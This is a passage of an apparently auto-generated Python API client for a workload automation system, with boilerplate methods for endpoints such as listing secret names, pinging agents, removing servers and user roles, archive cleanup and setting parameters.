local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/user/effectiveRights', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='RoleData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_workflow_insights_status(self, **kwargs): # noqa: E501
"""get Workflow Insights status # noqa: E501
get Workflow Insights status - topology and system parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workflow_insights_status(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: WorkflowInsightsStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_workflow_insights_status_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_workflow_insights_status_with_http_info(**kwargs) # noqa: E501
return data
def get_workflow_insights_status_with_http_info(self, **kwargs): # noqa: E501
"""get Workflow Insights status # noqa: E501
get Workflow Insights status - topology and system parameters # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_workflow_insights_status_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: WorkflowInsightsStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_workflow_insights_status" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/workflowinsights/status', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='WorkflowInsightsStatus', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_zos_templates(self, server, agent, **kwargs): # noqa: E501
"""Get z/OS Templates # noqa: E501
Get z/OS Templates # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_zos_templates(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str name: The z/OS Template Name
:return: list[ZosTemplateData]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_zos_templates_with_http_info(server, agent, **kwargs) # noqa: E501
else:
(data) = self.get_zos_templates_with_http_info(server, agent, **kwargs) # noqa: E501
return data
def get_zos_templates_with_http_info(self, server, agent, **kwargs): # noqa: E501
"""Get z/OS Templates # noqa: E501
Get z/OS Templates # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_zos_templates_with_http_info(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str name: The z/OS Template Name
:return: list[ZosTemplateData]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent', 'name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_zos_templates" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `get_zos_templates`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `get_zos_templates`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
if 'name' in params:
query_params.append(('name', params['name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/zostemplates', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[ZosTemplateData]', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def list_secrets(self, **kwargs): # noqa: E501
"""Get list of secret names # noqa: E501
Get the list of names of all the secrets in the vault # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_secrets(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: StringListResult
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.list_secrets_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.list_secrets_with_http_info(**kwargs) # noqa: E501
return data
def list_secrets_with_http_info(self, **kwargs): # noqa: E501
"""Get list of secret names # noqa: E501
Get the list of names of all the secrets in the vault # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_secrets_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: StringListResult
If the method is called asynchronously,
returns the request thread.
"""
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method list_secrets" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/secrets', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='StringListResult', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def ping_agent(self, server, agent, **kwargs): # noqa: E501
"""ping to the agent in the Server # noqa: E501
Ping an Agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.ping_agent(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str agent: The Agent. (required)
:param PingAgentParams body:
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.ping_agent_with_http_info(server, agent, **kwargs) # noqa: E501
else:
(data) = self.ping_agent_with_http_info(server, agent, **kwargs) # noqa: E501
return data
def ping_agent_with_http_info(self, server, agent, **kwargs): # noqa: E501
"""ping to the agent in the Server # noqa: E501
Ping an Agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.ping_agent_with_http_info(server, agent, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server. (required)
:param str agent: The Agent. (required)
:param PingAgentParams body:
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method ping_agent" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `ping_agent`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `ping_agent`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/ping', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def recycle_item(self, id, **kwargs): # noqa: E501
"""recycle item # noqa: E501
Recycle an item # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.recycle_item(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: item data (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.recycle_item_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.recycle_item_with_http_info(id, **kwargs) # noqa: E501
return data
def recycle_item_with_http_info(self, id, **kwargs): # noqa: E501
"""recycle item # noqa: E501
Recycle an item # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.recycle_item_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: item data (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method recycle_item" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `recycle_item`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/item/{id}/recycle', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_controlm_server(self, server, **kwargs): # noqa: E501
"""Delete Server # noqa: E501
Delete Server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_controlm_server(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: Server host name. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.remove_controlm_server_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.remove_controlm_server_with_http_info(server, **kwargs) # noqa: E501
return data
def remove_controlm_server_with_http_info(self, server, **kwargs): # noqa: E501
"""Delete Server # noqa: E501
Delete Server # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_controlm_server_with_http_info(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: Server host name. (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_controlm_server" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `remove_controlm_server`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_gateway(self, gateway_name, **kwargs): # noqa: E501
"""remove gateway. # noqa: E501
remove gateway. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_gateway(gateway_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str gateway_name: gateway name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.remove_gateway_with_http_info(gateway_name, **kwargs) # noqa: E501
else:
(data) = self.remove_gateway_with_http_info(gateway_name, **kwargs) # noqa: E501
return data
def remove_gateway_with_http_info(self, gateway_name, **kwargs): # noqa: E501
"""remove gateway. # noqa: E501
remove gateway. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_gateway_with_http_info(gateway_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str gateway_name: gateway name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['gateway_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_gateway" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'gateway_name' is set
if ('gateway_name' not in params or
params['gateway_name'] is None):
raise ValueError("Missing the required parameter `gateway_name` when calling `remove_gateway`") # noqa: E501
collection_formats = {}
path_params = {}
if 'gateway_name' in params:
path_params['gatewayName'] = params['gateway_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/gateway/{gatewayName}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_hub_from_cluster(self, agentname, **kwargs): # noqa: E501
"""remove hub from cluster. # noqa: E501
remove hub from cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_hub_from_cluster(agentname, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str agentname: Agent name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.remove_hub_from_cluster_with_http_info(agentname, **kwargs) # noqa: E501
else:
(data) = self.remove_hub_from_cluster_with_http_info(agentname, **kwargs) # noqa: E501
return data
def remove_hub_from_cluster_with_http_info(self, agentname, **kwargs): # noqa: E501
"""remove hub from cluster. # noqa: E501
remove hub from cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_hub_from_cluster_with_http_info(agentname, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str agentname: Agent name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['agentname'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_hub_from_cluster" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'agentname' is set
if ('agentname' not in params or
params['agentname'] is None):
raise ValueError("Missing the required parameter `agentname` when calling `remove_hub_from_cluster`") # noqa: E501
collection_formats = {}
path_params = {}
if 'agentname' in params:
path_params['agentname'] = params['agentname'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/cluster/hub/{agentname}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def remove_role_from_user(self, user, role, **kwargs): # noqa: E501
"""Remove a role from a user # noqa: E501
Remove a role from a user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_role_from_user(user, role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: Name of user (required)
:param str role: Name of role (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.remove_role_from_user_with_http_info(user, role, **kwargs) # noqa: E501
else:
(data) = self.remove_role_from_user_with_http_info(user, role, **kwargs) # noqa: E501
return data
def remove_role_from_user_with_http_info(self, user, role, **kwargs): # noqa: E501
"""Remove a role from a user # noqa: E501
Remove a role from a user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.remove_role_from_user_with_http_info(user, role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: Name of user (required)
:param str role: Name of role (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user', 'role'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method remove_role_from_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `remove_role_from_user`") # noqa: E501
# verify the required parameter 'role' is set
if ('role' not in params or
params['role'] is None):
raise ValueError("Missing the required parameter `role` when calling `remove_role_from_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user' in params:
path_params['user'] = params['user'] # noqa: E501
if 'role' in params:
path_params['role'] = params['role'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/user/{user}/role/{role}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def send_archive_cleanup_request(self, **kwargs): # noqa: E501
"""Deletes data (jobs including outputs and logs) from the Workload Archiving database. # noqa: E501
Deletes data (jobs including outputs and logs) by search criteria from the Workload Archiving database. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.send_archive_cleanup_request(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: Job's application.
:param str application_exceptions: Cleanup should skip job's application that are mentioned in exceptions
:param str sub_application: Job's sub application
:param str sub_application_exceptions: Job's sub application exception
:param str ctm: server name
:param str server: Server name
:param str ctm_exceptions: server exceptions
:param str server_exceptions: Server exceptions
:param str folder: Job's folder.
:param str folder_exceptions: Job's folder exceptions
:param str jobname: Job's name
:param str jobname_exceptions: Job's name exceptions
:param str library: Job's library
:param str library_exceptions: Job's library exceptions
:param str rule_name: Job's archive rule
:param str job_status: The job's end status.
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.send_archive_cleanup_request_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.send_archive_cleanup_request_with_http_info(**kwargs) # noqa: E501
return data
def send_archive_cleanup_request_with_http_info(self, **kwargs): # noqa: E501
"""Deletes data (jobs including outputs and logs) from the Workload Archiving database. # noqa: E501
Deletes data (jobs including outputs and logs) by search criteria from the Workload Archiving database. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.send_archive_cleanup_request_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param str application: Job's application.
:param str application_exceptions: Cleanup should skip job's application that are mentioned in exceptions
:param str sub_application: Job's sub application
:param str sub_application_exceptions: Job's sub application exception
:param str ctm: server name
:param str server: Server name
:param str ctm_exceptions: server exceptions
:param str server_exceptions: Server exceptions
:param str folder: Job's folder.
:param str folder_exceptions: Job's folder exceptions
:param str jobname: Job's name
:param str jobname_exceptions: Job's name exceptions
:param str library: Job's library
:param str library_exceptions: Job's library exceptions
:param str rule_name: Job's archive rule
:param str job_status: The job's end status.
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['application', 'application_exceptions', 'sub_application', 'sub_application_exceptions', 'ctm', 'server', 'ctm_exceptions', 'server_exceptions', 'folder', 'folder_exceptions', 'jobname', 'jobname_exceptions', 'library', 'library_exceptions', 'rule_name', 'job_status'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method send_archive_cleanup_request" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'application' in params:
query_params.append(('application', params['application'])) # noqa: E501
if 'application_exceptions' in params:
query_params.append(('applicationExceptions', params['application_exceptions'])) # noqa: E501
if 'sub_application' in params:
query_params.append(('subApplication', params['sub_application'])) # noqa: E501
if 'sub_application_exceptions' in params:
query_params.append(('subApplicationExceptions', params['sub_application_exceptions'])) # noqa: E501
if 'ctm' in params:
query_params.append(('ctm', params['ctm'])) # noqa: E501
if 'server' in params:
query_params.append(('server', params['server'])) # noqa: E501
if 'ctm_exceptions' in params:
query_params.append(('ctmExceptions', params['ctm_exceptions'])) # noqa: E501
if 'server_exceptions' in params:
query_params.append(('serverExceptions', params['server_exceptions'])) # noqa: E501
if 'folder' in params:
query_params.append(('folder', params['folder'])) # noqa: E501
if 'folder_exceptions' in params:
query_params.append(('folderExceptions', params['folder_exceptions'])) # noqa: E501
if 'jobname' in params:
query_params.append(('jobname', params['jobname'])) # noqa: E501
if 'jobname_exceptions' in params:
query_params.append(('jobnameExceptions', params['jobname_exceptions'])) # noqa: E501
if 'library' in params:
query_params.append(('library', params['library'])) # noqa: E501
if 'library_exceptions' in params:
query_params.append(('libraryExceptions', params['library_exceptions'])) # noqa: E501
if 'rule_name' in params:
query_params.append(('ruleName', params['rule_name'])) # noqa: E501
if 'job_status' in params:
query_params.append(('jobStatus', params['job_status'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/archive/cleanup', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def set_agent_parameter(self, server, agent, name, **kwargs): # noqa: E501
"""set agent parameter # noqa: E501
Set the value of the specified parameter in the specified agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_agent_parameter(server, agent, name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the agent is connected to. (required)
:param str agent: The name of the agent to update. (required)
:param str name: The parameter name. (required)
:param OptionalValue body: The new parameter value.
:return: KeyValue
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.set_agent_parameter_with_http_info(server, agent, name, **kwargs) # noqa: E501
else:
(data) = self.set_agent_parameter_with_http_info(server, agent, name, **kwargs) # noqa: E501
return data
def set_agent_parameter_with_http_info(self, server, agent, name, **kwargs): # noqa: E501
"""set agent parameter # noqa: E501
Set the value of the specified parameter in the specified agent. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_agent_parameter_with_http_info(server, agent, name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the agent is connected to. (required)
:param str agent: The name of the agent to update. (required)
:param str name: The parameter name. (required)
:param OptionalValue body: The new parameter value.
:return: KeyValue
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'agent', 'name', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method set_agent_parameter" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `set_agent_parameter`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `set_agent_parameter`") # noqa: E501
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `set_agent_parameter`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/param/{name}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='KeyValue', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def set_system_param(self, body, name, **kwargs): # noqa: E501
"""set value of a an em system parameter # noqa: E501
Set value of an enterprise management system parameter # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.set_system_param(body, name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param Value body: Param new value (required)
:param str name: Parameter name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.set_system_param_with_http_info(body, name, **kwargs) # noqa: E501
else:
(data) = self.set_system_param_with_http_info(body, name, **kwargs) # noqa: E501
return data
